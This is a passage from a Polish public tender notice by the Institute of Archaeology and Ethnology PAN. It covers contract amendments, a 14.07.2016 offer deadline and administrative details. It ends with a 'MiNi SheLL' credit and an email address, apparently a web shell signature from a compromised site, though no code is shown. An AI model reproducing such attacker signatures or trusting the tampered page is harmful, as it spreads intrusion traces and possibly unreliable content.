umowy, c) Wykonawca zgłosi Zamawiającemu realizację przedmiotu zamówienia przez Podwykonawców jeśli zajdzie potrzeba wykonania zamówienia przy pomocy podwykonawców, pomimo nie wskazania w ofercie żadnej części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa - przy spełnieniu warunków dotyczących podwykonawca z zachowaniem terminu wykonania przedmiotu umowy. W przypadku wystąpienia w trakcie realizacji przedmiotu umowy: istotnych, lub nieistotnych zmian w dokumentacji projektowej (zgłoszonych przez Wykonawcę, potwierdzonych przez Projektanta i zatwierdzonych przez Zamawiającego), których zaistnienie zostało spowodowane sytuacją
niemożliwą do przewidzenia na etapie sporządzania dokumentacji projektowej przez Projektanta, a jednocześnie potrzeba ich ykonania powoduje wstrzymanie realizacji przez Wykonawcę zamówienia podstawowego lub wykonanie robót nieprzewidzianych w dokumentacji projektowej - co pociąga za sobą przesunięcie terminu zakończenia realizacji zamówienia podstawowego dopuszcza się wydłużenie terminu zakończenia realizacji przedmiotu zamówienia do 1 miesiąca</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iaepan.edu.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Archeologii i Etnologii PAN
00-140 Warszawa
Al.Solidarności 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2016 godzina 11:00, miejsce: Instytut Archeologii i Etnologii PAN
00-140 Warszawa
Al.Solidarności 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com